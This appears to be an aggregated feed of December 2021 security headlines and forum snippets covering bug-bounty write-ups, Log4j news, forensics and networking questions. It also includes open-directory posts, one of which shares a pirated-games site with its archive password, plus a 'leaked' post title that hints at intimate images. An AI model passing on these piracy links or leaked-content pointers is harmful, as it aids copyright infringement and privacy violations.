    To gain initial access during a Red Team Engagement, Phishing might be a valid option. Continue reading on Medium »  ( 3 min )
  • Open

    Accessing data in suspect disk
    After copying with write block how to investigators access data in an encrypted drive? Do they have to break the encryption password with powerful servers? or are there other methods? submitted by /u/thecirclingfly [link] [comments]  ( 2 min )

  • Open

    Join Synack Red Team
    Hi, how to join synack after finishing HTB track submitted by /u/0xA1MN [link] [comments]
    Stay organized with your pentesting knowledge
    Hi, I am not a professional, I just love pentesting/CTF stuff and I discover new things every day, thanks to HackTheBox, TtyHackMe and other platforms. I would like to collect all my knowledge online, let's say a webpage with methodology step-by-step: information gathering scanning search for vulnerabilities and so on.. I would like to put "cheatsheet" for useful commands like nmap, dirbuster, sqlmap .. I tried a simple blog with Wordpress, but I wondering if you use something better (github)? Thankyou. submitted by /u/g-simon [link] [comments]  ( 2 min )
    Firewall+IPS hardware recommendations for a home LAN setup
    Hi All, i'm planning to play around with some firewall distros that have IPS/Suricata enabled. Target environment is for a SOHO with around 10 people, not hosting any web servers or whatnot. Any hardware recommendations, particularly on the CPU and RAM? Is a Pentium Gold G6400(2 cores, 4 threads) and 4GB RAM good enough? i read somewhere that CPU(# of cores) carries more weight than RAM, IPS-wise. Would it make sense to use AMD processors instead? Wouldn't the GPU cores just go to waste on a firewall/IPS? tia submitted by /u/albertcuy [link] [comments]  ( 1 min )
    How secure is it to stay logged into a sife?
    Say you stay logged into an email or social media site, is there any risk in doing so? submitted by /u/RaZdoT [link] [comments]  ( 1 min )
    How secure is Netgear RAX45 VPN with Remote Desktop?
    I turned on VPN in router settings, which uses OpenVPN, and successfully set up a Remote Desktop, using OpenVPN Client and Remote Desktop for windows 10. Wanted to ask: - how secure is this setup? - is there a better way to have a cheap and personal/small business secure Remote Desktop with VPN? submitted by /u/WiseMan9000 [link] [comments]  ( 1 min )
  • Open

    Smallish list of older movies. Nothing after 1972. Some good stuff here.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Animation with audio options for english or farsi, according to the few I checked; *slow, though)
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    从了解洞态IAST到加入开源社区
    作为公司信息安全部的成员,确保每一条业务线的应用安全,是我工作的一部份,那么如何完全这项使命呢?  ( 1 min )
    从0到1编写一个Xposed Module :Anti Screenshot
    菜鸡的截图之路  ( 1 min )
    Abaddon:专为红队研究人员设计的增强工具
    Abaddon旨在帮助红队研究人员提升运营效率,并通过更高的速度和更隐蔽的方式执行某些重复操作。  ( 1 min )
  • Open

    HOW I Found 17 Critical and Medium Security Bug on INDUSIND Bank
    Hi, everyone Continue reading on Medium »  ( 3 min )
    How I got access Maxlifeinsurance insurance company AWS metadata access by SSRF
    Hi, everyone Continue reading on Medium »  ( 3 min )
    Jerry From Hackthebox
    Hello everyone I am HAC and Today we will be doing jerry from Hackthebox Continue reading on Medium »  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾, Continue reading on Medium »  ( 2 min )
    SQL Injection — 1st Dose
    An Injection that is not used for treatment! Continue reading on Medium »  ( 2 min )
    Information Disclosure leads to sensitive credential($$$)
    Hi Hackers, hope you are fine.my name is khan mamun(white hat hacker) This is my 3rd write up. Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2021-12-25 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-25 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    I found (and fixed) a vulnerability in Python
    Article URL: https://tldr.engineering/how-i-found-and-fixed-a-vulnerability-in-python/ Comments URL: https://news.ycombinator.com/item?id=29683853 Points: 3 # Comments: 0  ( 2 min )
  • Open

    Router Management Practices: Web, App, and forcing to associate user home network with a vendor account
    submitted by /u/wkwrd [link] [comments]
    Make Your Pc Notify Your Phone Whenever There is Movement Around it
    submitted by /u/MagicianPutrid5245 [link] [comments]  ( 1 min )
  • Open

    Empire: LupinOne Vulnhub Walkthrough
    Empire: LupinOne is a Vulnhub easy-medium machine designed by icex64 and Empire Cybersecurity. This lab is appropriate for seasoned CTF players who want to put The post Empire: LupinOne Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Empire: LupinOne Vulnhub Walkthrough
    Empire: LupinOne is a Vulnhub easy-medium machine designed by icex64 and Empire Cybersecurity. This lab is appropriate for seasoned CTF players who want to put The post Empire: LupinOne Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    CaseVegas Walkthrough — Cyberdefenders
    Challenge: CaseVegas Continue reading on Medium »  ( 7 min )
  • Open

    Forensic Courses
    Took the video lectures from EC Council CHFI. But it did not teach me how to use tools or real world data just the theory. Can you suggest a course/resource/links that teach you how to use forensic tools with real world scenarios. submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    A bit of amateur detective work
    Hi all, I am looking at some student submissions of word 2010 docs. I suspect the time stamp has been changed in some way. Is there a way to verify it beyond just looking at the word doc's property? submitted by /u/HelloAmes [link] [comments]  ( 2 min )
  • Open

    Dalfox 2.7 Released 🎉
    Hi hackers! Dalfox v2.7 has been released 🎉🎉🎉 There are not many added features this release. But it’s better than before, so I recommend an update! Then let’s start the review. and Have a great holiday 🧑🏼‍🎄 Thank you ❤️ First, Thank you so much all contributors !! Thanks to our, this project is getting better and better. Thank you always! Release note Github | DockerHub Add BAV Module ESI Injection Support to windows/arm64 Upgrade go dependency (1.

  • Open

    I set up MAC address filtering but there are still unrecognized devices on my network. Is this normal?
    I recently set up MAC address filtering (white-list/allow-list) to only allow certain devices to connect to my network. However, when I check connected devices, I still see two devices that I don't recognize and they are not in my allow-list. How are they connecting to the network? I tested the MAC address filtering with my phone temporarily removing it from the list, and the filter worked. So I am confused why those two devices are not blocked. For what it's worth, both devices are showing as "Espressif Inc" and are probably part of my smart devices, so I am not too concerned about them. However, I would still like to understand why they are not being blocked by the filter. submitted by /u/ultrakawaii [link] [comments]  ( 1 min )
    identifies SSL/TLS depencies
    Hello, It may look like a noob question but, It's my first job and... We have servers on which weak SSL/TLS versions are running. So,I have spoken with servers owners, check on which port their usage has been detecte, At the end of the investigation, I had determined that it was ok if I disabled TLS 1.0 and 1.1. But this was a mistake and one of our importante application couldn't communicate anymore with our SQL server. In the panic I reversed all of my changes. And now I'm afraid of trying to patch this issues. So was the best way to detect the usage of SSL/TLS. Should I sniff every servers with wireshark or something else? Thanks you all submitted by /u/Low_Lettuce_8933 [link] [comments]  ( 2 min )
    How to view the exploit code of metasploit's auxiliary or exploits?
    I've been trying to get shell into a exploit of SMB but I think it uses somewhat of buffer overflows scheme. Any way to see the exploit [code] behind metasploit exploits? Here's the exploit I've been trying to use: exploit/windows/smb/ms17_010_eternalblue submitted by /u/The_Intellectualist [link] [comments]  ( 1 min )
  • Open

    Thread in lunar clinet?? java.trojan.genericgba.30921
    Hello, I recently did an analysis with bitdefender and I detected this thread: java.trojan.genericgba.30921 but I looked for this name on the internet but nothing came out, the strange thing is that the thread was detected in a Lunar Client folder (A minecraft client) and also in a minecraft mod (Geyser) this seems very strange to me because according to the lunar client and geyser mod it is safe, does someone here have an answer to why it is detected as a thread? submitted by /u/QuirkyCod4995 [link] [comments]  ( 1 min )
    About work fields (investigation, private market etc).
    I'm 18 and I'm from Brazil. I'm currently studying Computer Science. Some things lead me to become interested in computer forensincs these past months, and I'm interested on following this career. Since here in Brazil you first need a CS degree to do a computer forensics course, I'm focused on finishing my CS course first for now. I looked at the FAQ here and got a lot of useful information, but I still have one that wasn't answered: what are the fields you can work? I know you can work in law enforcement and do forensics analysis to find digital evidence of a suspect (wich is most cases I belive), but can you work on the investigation field (like tracing criminals online)? If not, how do I work on this investigation field related to crimes online? Is computer forensics the best thing to study in this case? Another question is: on the private work field, how does it work? Do you work with data recovery stuff? I hope I don't annoy you with those questions, but I couldn't find them here yet! submitted by /u/silva-txt [link] [comments]  ( 1 min )
    Timeline
    hi, is there a way in excel or other software to put a list of phonecalls, their dates and time and get a timeline that show how many calls were made to the same phone or to the same phone by date and time. Thanks in advance. submitted by /u/joshmaidom [link] [comments]  ( 1 min )
    ?? After seizing an Android 10, should keep charging battery ??
    📷 There may be weeks before digital forensic people come to examine the Android 10 phone with unknown passcode. It was in use when seized, but later auto locked. Pls Help: (1) Should keep it in power on and keep charging it? since battery cannot last long enough for weeks. (2) Would it be harder to unlock or retrieve data if let it power down and then switch on later? submitted by /u/Just_Drama5668 [link] [comments]  ( 2 min )
  • Open

    Joni MItchell albums
    submitted by /u/International_Milk_1 [link] [comments]
    Clifford D Simak reading City
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Hmm. Some music, but other types of audio (see comment)
    submitted by /u/International_Milk_1 [link] [comments]
    Tons of pirated video games
    Hi i use this website for repacks ddl http://s5.gamingmaster.ir it has a home page too http://gamingmaster.ir ​ archives password: gamingmaster.ir submitted by /u/develhoper [link] [comments]  ( 1 min )
    movies, korean tv dramas, tv series, etc etc (some txts in english, some in korean-same with content-no english subs for korean dramas)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    movies, tv shows, music, manga, etc etc (slow speeds)
    submitted by /u/International_Milk_1 [link] [comments]
    music for ringtones
    submitted by /u/International_Milk_1 [link] [comments]
    one very small music list (at least in open directory format-see below) , and 1 very small movie list, with slow speeds.
    THe movie one Index of / The Music one Index of /Directos/ (ladiscoteca.net) If you go to parent directory, there is a lot more stuff divided into years, genres etc etc. There is a radio player if you stroll down, Maybe someone else can do a better job of explaining it than me. Although it is not in open directory format. So if you just want to stream, it's good. I think the sound is great though. The one hit wonders is a nice one. submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Anything you want here is for free
    Download limit exceeded for Main drive now 😔 limit resets at 2021-12-25 at 00:00:00 UTC. https://premiuim.rahuljayant.workers.dev/0:/ Edit - You can search from the hamburger menu - For username and password for 18+ from Drop down menu DM , otherwise post will be labelled as NSFW. submitted by /u/rahuljayant1 [link] [comments]  ( 2 min )
    Documentation for classic computers
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    documentary type shows
    https://archive.org/download/pbsnovadocs https://davfl70.org/~davflsev/movies/WWI/ https://ir2.papionvod.ir/Media/Series/Terra%20Nova/Season%201/ http://flixhub.net/Data/Disk3/English%20Tv%20Serise/Planet%20Earth/Season%2001/ https://archive.org/download/Cops-Seasons-1-33-Cops-Reloaded https://archive.org/download/DocuCollection_201702 https://archive.org/download/InsideTheAmericanMobS01E06EndGame 2nd and 3rd links have a ton in their parent directories and 4th is from the most recent post here, sorry for that repost but i figured it id save someone the time of scrounging thru submitted by /u/ohimjustakid [link] [comments]  ( 1 min )
    science fiction and fantasy folk music (small slection)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    movies
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    How to exploit Log4j vulnerabilities in VMWare…
    submitted by /u/digicat [link] [comments]  ( 1 min )
  • Open

    Hunting down spider-man using Sherlock
    Ever wondered how to get the social media links of your favorite marvel superheroes or as a matter anyone’s else online social presence? Continue reading on Medium »  ( 1 min )
    Your Stalker Wants Your Outlet
    As crazy as it may sound, your stalker is looking for any possible clue in your photos to get a general idea of where you’re located and… Continue reading on Medium »  ( 1 min )
  • Open

    Micropatching “Ms-Officecmd” Remote Code Execution (No CVE)
    Article URL: https://blog.0patch.com/2021/12/micropatching-ms-officecmd-remote-code.html Comments URL: https://news.ycombinator.com/item?id=29674988 Points: 3 # Comments: 0  ( 5 min )
    Where's the Interpreter? (CVE-2021-30853)
    Article URL: https://objective-see.com/blog/blog_0x6A.html Comments URL: https://news.ycombinator.com/item?id=29669026 Points: 3 # Comments: 0  ( 28 min )
  • Open

    Free public Docker image vulnerability DB
    Article URL: https://dso.atomist.com/explore Comments URL: https://news.ycombinator.com/item?id=29674898 Points: 2 # Comments: 0
    ShortList: Log4j Vulnerability Tools
    Article URL: https://haydenjames.io/log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29673107 Points: 1 # Comments: 0  ( 4 min )
    Alberta MLA resigns after RCMP searches home after vulnerability report`
    Article URL: https://www.cbc.ca/news/canada/edmonton/alberta-mla-thomas-dang-resigns-from-ndp-caucus-after-rcmp-searches-home-1.6294219 Comments URL: https://news.ycombinator.com/item?id=29670252 Points: 9 # Comments: 0  ( 2 min )
  • Open

    SecWiki News 2021-12-24 Review
    利用CodeQL分析并挖掘Log4j漏洞 by ourren vulntarget漏洞靶场系列(二)— vulntarget-b by ourren 更多最新文章,请访问SecWiki
    SecWiki News 2021-12-24 Review
    利用CodeQL分析并挖掘Log4j漏洞 by ourren vulntarget漏洞靶场系列(二)— vulntarget-b by ourren 更多最新文章,请访问SecWiki
  • Open

    Full Path Disclosure in Wordpress Rest API Response
    Showmax disclosed a bug submitted by fariqfgi: https://hackerone.com/reports/1358888 - Bounty: $50
    Xss At Shopify Email App
    Shopify disclosed a bug submitted by shaktiranjan867: https://hackerone.com/reports/1339356 - Bounty: $500
    Reflected XSS on dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1212235
    Reflected XSS at dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1210921
  • Open

    Vibranium Debug Campaign
    Vibranium is pleased to announce the debug bounty campaign! Continue reading on Medium »  ( 2 min )
    Getting access to the Database of a Crypto Exchange using Google Dorks!
    Hello, Continue reading on Medium »  ( 2 min )
    Crema Bug Bounty Program Winners Announcement
    Continue reading on Medium »  ( 1 min )
    Install Nuclei on Kali Linux [Latest using go1.17]
    Nuclei : Vulnerability Scanner. Continue reading on Medium »  ( 1 min )
    Exposing Millions of Investor and Startup Register details and PII INFO in STARTUPINDIA (Govt of…
    Hi, everyone Continue reading on Medium »  ( 5 min )
  • Open

    Cloud Security Breaches and Vulnerabilities: 2021 in Review
    submitted by /u/thorn42 [link] [comments]
    Blister malware can breach your devices in absolute stealth
    submitted by /u/IT_band [link] [comments]  ( 1 min )
    Log4PowerShell - A CVE-2021-44228 Proof of Concept / Demo I wrote in PowerShell
    submitted by /u/aalex954 [link] [comments]
  • Open

    2022年及以后的五项网络安全预测
    目前,网络安全业内领导者面临了众多挑战,并且未来几年依旧会持续增多。  ( 1 min )
    CVE-2021-31956 漏洞分析
    总体来说难度不大,非常适合初学者入门。  ( 1 min )
    FreeBuf甲方群讨论 | 企业安全的价值到底该如何度量?
    有人比喻到,安全就是桥两边的护栏,不出事谁也感受不到它的价值,没有又觉得不踏实。
    IoT SAFE ——强化物联网生态系统的安全性
    隧道的尽头是光。  ( 1 min )
    明年见 | CIS 2021春日版议题预告直播圆满成功
    这个圣诞,我不愿让你一个人因为有FreeBuf公开课陪伴着你~12月21日-12月23日每晚19点,FreeBuf公开课邀请大会各论坛嘉宾直播提前剧透议题,携手13位技术专家在直播间内与大家共话网络安全新技术、新趋势。足不出户,提前掌握各分论坛的干货内容,与行业大咖近距离交流,这个圣诞不再让你孤单~在这3天的直播里,来自各行各业的嘉宾给最为广泛的网络安全一线工作者中的代表者和佼佼者们带来了丰富的内  ( 1 min )
    windows ALPC内核拦截的方法
    ALPC这个只是一个标准协议,每个不同的服务比如 创建服务与创建账号与搜索系统信息等的具体内容都是不同的,要自己手动解码。  ( 2 min )
    什么是CDN?CDN的工作原理是怎样的?
    CDN是构建在网络之上的内容分发网络,依靠部署在各地的边缘服务器。
    基于漏洞优先级,构建关基漏洞主动管理体系 | 世界信息安全大会
    浅谈关基建漏洞主动防御体系建设。  ( 1 min )
    《工业和信息化领域数据安全风险信息报送与共享工作指引(试行)(征求意见稿)》发布
    《工作指引》指出,风险信息报送,是指有关单位向工业和信息化部、地方工业和信息化主管部门、地方通信管理局报送数据安全风险信息的行为。
    Web渗透测试中我们该收集什么信息?
    知己知彼,百战不殆。一文看懂如何在渗透测试前期最大化收集信息。  ( 1 min )
    因为诈骗太多,“俄罗斯微信”VK强制上线双因素认证
    VK终于开始引入双因素身份认证,并计划在 2022 年 2 月强制要求大型社区的管理员使用。  ( 1 min )
    研究显示,圣诞期间的的撞库攻击将激增
    研究分析称,去年圣诞节和新年购物期间的撞库事件增加了 56%,预计 2021 年同期每天将有多达 800 万次针对消费者的攻击。  ( 1 min )
    逆向分析教程(二)——大本营
    逆向分析教程(一)——调试代码 新增调试命令我想大家根据上文实操已经掌握了提到的基本指令,我们再来复习下,F7,F8,ctrl+F2,ctrl+F9,如果感觉陌生建议回炉重造。因为今天我们又要开始了解  ( 1 min )
    FreeBuf周报 | Gumtree 分类网站泄露客户信息;Hive 勒索软件正大肆发起网络攻击
    我们总结推荐本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!  ( 1 min )
    大型流量数据计算分析平台的构建与行业实践 | CIS 2021·Spring春日版大会议题初探
    基于流量的大型数据分析平台建设,能为企业提供更加动态、精准的营销建议,并从安全上为数据保驾护航。  ( 1 min )
    英伟达(NVIDIA)披露了受 Log4j 漏洞影响的应用程序
    Log4Shell漏洞,正在全球范围内被大量攻击利用。  ( 1 min )
  • Open

    [project]Bypass Firewalls using Various Evasion Techniques
    Bypass windows firewall using Nmap evasion techniques Continue reading on Medium »  ( 2 min )
  • Open

    SQL Injection JR. Pentester -TryHackMe Part 2
    Hi folks, welcome back to part 2 of SQL injection in JR. Pentester path.  ( 3 min )
    Identity Management Vulnerability Taxonomy v1.5
    I really like the OWASP list of vulnerabilities because it mostly stays in an uniform level of abstraction. Some issues are fairly… Continue reading on InfoSec Write-ups »  ( 4 min )
  • Open

    SQL Injection JR. Pentester -TryHackMe Part 2
    Hi folks, welcome back to part 2 of SQL injection in JR. Pentester path.  ( 3 min )
    Identity Management Vulnerability Taxonomy v1.5
    I really like the OWASP list of vulnerabilities because it mostly stays in an uniform level of abstraction. Some issues are fairly… Continue reading on InfoSec Write-ups »  ( 4 min )
  • Open

    SQL Injection JR. Pentester -TryHackMe Part 2
    Hi folks, welcome back to part 2 of SQL injection in JR. Pentester path.  ( 3 min )
    Identity Management Vulnerability Taxonomy v1.5
    I really like the OWASP list of vulnerabilities because it mostly stays in an uniform level of abstraction. Some issues are fairly… Continue reading on InfoSec Write-ups »  ( 4 min )

  • Open

    Tg pinay
    submitted by /u/kotsu0401 [link] [comments]
    TG pinay leaked
    submitted by /u/kotsu0401 [link] [comments]
    APK for music, movies etc etc
    submitted by /u/International_Milk_1 [link] [comments]
    Index of /library/
    Lots of pdf:es in all kind of subjects. http://erewhon.superkuh.com/library/ submitted by /u/CourseCalm [link] [comments]
    Several albums of deep-sea robot dives from Columbia University's climate school
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Writing/Poetry Anthology Drafts
    submitted by /u/VeinyNotebook [link] [comments]
  • Open

    My smart TV has some sketchy ports open. Any clues?
    I captured some persistent host discovery traffic on my home WiFi network with Wireshark. There's a never-ending activity in UDP and SSDP coming from this device. A basic nmap scan shows the following: Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-23 18:37 -03 Initiating ARP Ping Scan at 18:37 Scanning 192.168.1.11 [1 port] Completed ARP Ping Scan at 18:37, 0.13s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 18:37 Completed Parallel DNS resolution of 1 host. at 18:37, 0.01s elapsed Initiating SYN Stealth Scan at 18:37 Scanning 192.168.1.11 [1000 ports] Discovered open port 8080/tcp on 192.168.1.11 Discovered open port 9001/tcp on 192.168.1.11 Discovered open port 9080/tcp on 192.168.1.11 Discovered open port 8002/tcp on 192.168.1.11 Discovered open port 8001/tcp on 192.168.1.11 Discovered open port 9000/tcp on 192.168.1.11 Completed SYN Stealth Scan at 18:37, 0.23s elapsed (1000 total ports) Nmap scan report for 192.168.1.11 Host is up, received arp-response (0.0058s latency). Scanned at 2021-12-23 18:37:29 -03 for 0s Not shown: 994 closed ports Reason: 994 resets PORT STATE SERVICE REASON 8001/tcp open vcom-tunnel syn-ack ttl 64 8002/tcp open teradataordbms syn-ack ttl 64 8080/tcp open http-proxy syn-ack ttl 64 9000/tcp open cslistener syn-ack ttl 64 9001/tcp open tor-orport syn-ack ttl 64 9080/tcp open glrpc syn-ack ttl 64 MAC Address: 8C:EA:48:XX:XX:XX (Unknown) Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.052KB) It's just a Samsung smart TV. I'm really curious (maybe even concerned!?) about the service on port 9001. What could be going on? submitted by /u/EONRaider [link] [comments]  ( 3 min )
    gSuite login: Okta and VPN, or context aware access, which one is better?
    Hi there, I'm setting up gSuite and need some advice here. Use case requirements: operations team member will have access to customer data on Google Drive, so we want to enforce those team members to only view such data via corporate VPN. Our sales team members do not have access to customer data, so we do not want them to login via VPN because that's extra friction. ​ After researching online, I found two ways of doing this: a. Using the context aware access feature from gSuite https://support.google.com/a/answer/9275380?product_name=UnuFlow&hl=en&visit_id=637758886340041076-3475162686&rd=1&src=supportwidget0&hl=en Pro: set up seems straightforward, and can configure based on teams Con: pay more per user, it's like $8 more per user to our current edition b. Set up gSuite to login with Okta via SAML, and then configure Okta log on policies to require VPN for certain users https://support.google.com/a/answer/6369487?product_name=UnuFlow&hl=en&visit_id=637758886340041076-3475162686&rd=1&src=supportwidget0&hl=en#zippy=%2Csso-usernetwork-mapping-matrix Pro: Saves money, get more familiar with SAML which seems useful? Questions for experts here about this approach: Is it easy to quickly provision which users are required to login via Okta and VPN? Anything we should be careful about? The process seems quite complicated. How much time will it take? Technically how is this different from option a? I guess gSuite does all the configuration automatically for you to save the time? ​ Which one would you advise us to go for? Any thoughts are tremenduously appreciated! submitted by /u/johnestar [link] [comments]  ( 2 min )
    Is it possible to put SSO like Okta behind VPN?
    Hi there, I'm wondering is it possible to put Okta behind VPN. If employees are not connected to company VPN, login via Okta should fail. How should I enable this? submitted by /u/johnestar [link] [comments]  ( 1 min )
    Threat Research
    I’m looking into getting into a threat research position and have a few questions: 1) average workload/what to expect 2) what certs/projects would help me get into a position like this 3) any advice from anyone in this type of role I currently do analyst/threat hunting work so I have some experience but hate my current job due to soc grind and burnout. I enjoy active defense topics like honeypots and I think a research role is better suited. MA and phishing analysis is always a fun time for me submitted by /u/blue_Kazoo82 [link] [comments]  ( 1 min )
    Home Networking
    Hello everyone, soon I will be moving out of my parents house, and I'm interested on the topic of home networking, security and privacy. Here are my plans, currently for the last 4 years I've fully switched to GNU/Linux and even switched my phone OS to a privacy respecting one (GrapheneOS). I plan on having a server that will have Jellyfin on it accessed remote via Caddy (Reverse Proxy), NextCloud as an alternative to Google Drive/Google Photos, and an OpenVPN connection to my home network and PiHole. My main concern is that I would like to build a separate gaming PC that will run Windows, also if I have friends over they would need WiFi. Is it possible to separate my home network into 3 smaller networks with seperate SSID's that won't communicate between eachother (basically what I'm asking is it possible to have separate networks for guests and me ? ​ I would have some IoT devices such as a smart TV but is it possible to filter it out in ACL so that the TV only has LAN but can't connect to the internet ? Since I'm moving out it will be a great learning experience to make my home network. Now I have a few questions and I hope some of you lovely people could answer them. Keep in mind I'm focused on privacy and security mostly here. Which router should I go for ? Which model is the best, should I go for OpenWRT ? Should I get a L3 switch ? If so what model would be the best ? Is it possible to separate my home network into smaller ones that won't communicate between each other (guest, my personal and IoT LAN devices) ? Well that's all the questions I have, thank you in advance. ​ EDIT: I forgot to add this I would need WiFi so that means I would need some WiFi Access Points, which models should I look for ? submitted by /u/throwaway89722316 [link] [comments]  ( 1 min )
    Should I be worried about non-financial hacks when assessing my security?
    So whenever I analyse my personal security, both cyber and IRL, I always look at my finances and ask "How could a hacker steal any of my funds?", so it usually defaults to me running through my financial accounts and seeing what it would take for a hacker to hack into those accounts and steal the funds. I feel if I run through all the places where my money is and check them off, I should be good, but I wonder - are there other things I should be worried about also? What's the worst that could happen if one of my non-financial accounts is hacked into? submitted by /u/EnterShikariZzz [link] [comments]  ( 3 min )
    Just had my first cyber security interview
    Hi, I am an MIS student who just finished college. Unfortunately i have to do one year of military service,i will be 25 1/2 or 26 when i finish. There is a gap between me as a mis student and cs students. Thankfully it wasn’t as big as i thought. The interviewer liked my python skills and reverse skills. However he told me i need to strength my networking and web skills and told me to study compitaA+ and compita security . Told me if i want to study malware analysis i should study architecture and os. The interviewer liked that i am a geek the most part and although it isn’t my major i kept studying security and exploitation. Between the time of my service and now i should start studying networks ,web,os,and architecture. So couple of questions now . 1-I I have an ardunio,can i study OS and architecture from it ? 2-He told me to apply again after finishing these courses but the cyber security isn’t demanded in the labor market of my country yet. So i was thinking of working remotely till then,any advices on that? I was thinking of hackthebox and ranking up to apply for jobs on there. submitted by /u/Ramseesthe4th [link] [comments]  ( 2 min )
    Currently making 60k CAD in Montreal as a cybersecurity analyst, am I underpaid ?
    Hi everyone, I'm currently working as the sole Cybersecurity Analyst for a construction company in Montreal, making 60k per year + 4% bonus. 2 years of experience in IT in general. I'm wondering if I'm currently underpaid ? And how much should I expect if I jump ship next year. Thanks. submitted by /u/gateau_a_la_creme [link] [comments]  ( 4 min )
    Why are Port 6666 (irc) and Port 8443 (https-alt) exposed on my wan interface?
    I recently got my hands on a static IP from my ISP and was playing around with nmap when I noticed that booth port 6666 and 8443 are open. I never used any kind of software related to irc. I have a laptop running Ubuntu, a Xbox and 2 iPhones on my network. I think the culprit might be my Asus router as I checked my laptops firewall setup without any leads. Disabling UpnP doesn’t do anything. Should I be worried? Looking up port 6666 brings up a lot of scary sounding results. submitted by /u/Echiketto [link] [comments]  ( 1 min )
  • Open

    Hook Heaps and Live Free
    submitted by /u/dmchell [link] [comments]
    BLISTER malware campaign discovered
    submitted by /u/dmchell [link] [comments]
  • Open

    Cyber Detective OSINT CTF “Life Online” Writeup
    The Cyber Society at Cardiff University runs Cyber Detective CTF, a free OSINT CTF. I started with the “Life Online” challenges, which… Continue reading on Medium »  ( 4 min )
    Viaggio all'interno delle recensioni 5 stelle di Amazon
    Tra intermediari e DataLeak Continue reading on Medium »  ( 3 min )
    How To Hack Any Website
    [Part — 2: Content Discovery] Continue reading on Medium »  ( 3 min )
  • Open

    Wrote a tool to verify whether a simple Java webapp is vulnerable to CVE-2021-44228 given a version of Log4J, Java and possibly some mitigations.
    submitted by /u/One_Explanation_4076 [link] [comments]  ( 1 min )
    RF Bugs and their detection using Software-Defined Radio
    submitted by /u/sebazzen [link] [comments]
    Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
    submitted by /u/sebazzen [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-23 Review
    基于大数据技术的攻击溯源研究 by ourren Java代审1:Maven基础知识 by jinxing 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-23 Review
    基于大数据技术的攻击溯源研究 by ourren Java代审1:Maven基础知识 by jinxing 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Detecting NTDS.DIT Theft - ESENT Event Logs
    Merry Christmas and Happy Holidays! In this 13Cubed episode, we'll take a look at the value of ESENT Event Logs in detecting potential theft of NTDS.DIT. Episode: https://www.youtube.com/watch?v=rioVumJB0Fo Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]  ( 1 min )
    forensic image infected analysis
    I would like to ask what if i got usb with image from someone for analysis and i found that the usb is infected. what should i do to start analyzing it (connect to my lab (FRED) or install mys tools on vm for analysis or what? submitted by /u/ma7moodso7eem [link] [comments]  ( 1 min )
  • Open

    Log4j vulnerability resource center
    Watch this space for the latest news and resources from Invicti on the Log4j crisis. READ MORE  ( 2 min )
  • Open

    How I Get $1350 From IDOR Just Less 1 hours
    Assalamualaikum, wr,wb , Continue reading on Medium »  ( 2 min )
    Cross-Site Request Forgery — CSRF
    What is Cross-Site Request Forgery ? Continue reading on Medium »  ( 4 min )
    Information Disclosure on CodePolitan
    Hello everyone, in this opportunity i will share a brief summary of the information disclosure bug that i found on the CodePolitan… Continue reading on System Weakness »  ( 2 min )
    Information Disclosure on CodePolitan
    Hello everyone, in this opportunity i will share a brief summary of the information disclosure bug that i found on the CodePolitan… Continue reading on Medium »  ( 1 min )
    AppSec Series 0x04: Crowdsourcing Security
    More than a decade ago, Jeff Howe defined a phenomenon that has gone unnoticed for a long time: “Non professionals contribute to the… Continue reading on The Startup »  ( 6 min )
  • Open

    FreeBuf早报 | 中国首套“新闻数字藏品”发行;《舞力全开》用户数据遭泄露
    新华社在今天发行中国首套“新闻数字藏品”NFT。  ( 1 min )
    疑似“肚脑虫”APT组织近期针对孟加拉国的攻击活动分析
    Donot“肚脑虫”是疑似具有南亚背景的 APT 组织,其主要以周边国家包括巴基斯坦、孟加拉国、尼泊尔和斯里兰卡的政府和军​​事为目标进行网络攻击活动。  ( 1 min )
    “杀不掉”的“虚灵矿工”——门罗币挖矿木马分析报告
    该挖矿木马在文件末尾附加了大量空字节、使自身大小达到百MB级别,从而达到杀软和沙箱检测逃逸的目的。  ( 1 min )
    K-12教育应用存在“严重安全风险”
    K-12教育使用的许多应用程度存在各种严重的安全问题,其中包括可能导致学生数据“不受监管和失控”地分享给广告公司。
    美国最新的Hack DHS漏洞赏金计划已包含log4j相关漏洞
    为了应对最近发现的 log4j 漏洞,部门正在扩大Hack DHS漏洞赏金计划的范围,包括额外的激励措施,以发现和修补系统中与log4j有关的漏洞。  ( 1 min )
    Microsoft Teams 允许网络钓鱼漏洞,自3月至今未被修复
    Microsoft Teams 是一款基于聊天的智能团队协作工具,可以同步进行文档共享、语音、视频会议等即时通讯功能。  ( 1 min )
    调查显示,60%项目中带有已知漏洞未打补丁的软件可让攻击者进一步渗透
